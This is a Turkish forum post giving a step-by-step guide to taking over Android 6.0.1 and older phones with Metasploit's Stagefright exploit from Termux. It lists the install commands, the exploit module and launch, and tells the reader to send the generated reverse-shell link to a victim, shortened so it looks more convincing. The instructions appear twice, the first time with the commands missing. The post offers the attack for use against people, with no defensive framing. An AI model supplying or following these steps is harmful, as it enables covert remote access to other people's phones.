Selam dostlar bugün sizlere daha önce forumda karşılaşmadığım bir açıktan bahsedeceğim bu açık 2015-2016 yıllarında çok popülerdi ve bu açık sayesinde android 6.0.1(marshmallow) sürüm ve altındaki sürüm telefonlara tek bir linke tıkaltarak sızılması mümkün oldu ben işlemleri termuxtan anlatacağım
1. Metasploiti indirmek için
2. Search stagefright yazıyoruz ve karşımıza çıkan exploiti kopyalıyoruz daha sonra
3.
Komutunu kopyalayip devam ediyoruz
5.
Konum bu kadardı arkadaşlar çok yaygın bir açık değil yararlı olacağını düşündüm. İYİ FORUMLAR
1. Metasploiti indirmek için
pkg install unstable-repo
ve pkg install metasploit
diyerek kuruyoruz msfconsole diyerek başlatıyoruz2. Search stagefright yazıyoruz ve karşımıza çıkan exploiti kopyalıyoruz daha sonra
3.
use exploit/android/browser/stagefright_mp4_tx3g_64bit
Komutunu kopyalayip devam ediyoruz
5.
exploit
yazıyoruz zaten gerekli bilgileri giricek ve işlemimiz bitmiştir karşımıza started reverse TCP handler on 192.168.x.x:4444 böyle bir ekran gelicek burda yazan şeyi kopyalayıp hedefe gönderiyoruz ve linke tıkladığı an bağlantı sağlanmış oluyor hiçbirşey yapmasına gerek yok linke tıklasın yeter linki kısaltırsanız çok daha inandırıcı olacaktır Konum bu kadardı arkadaşlar çok yaygın bir açık değil yararlı olacağını düşündüm. İYİ FORUMLAR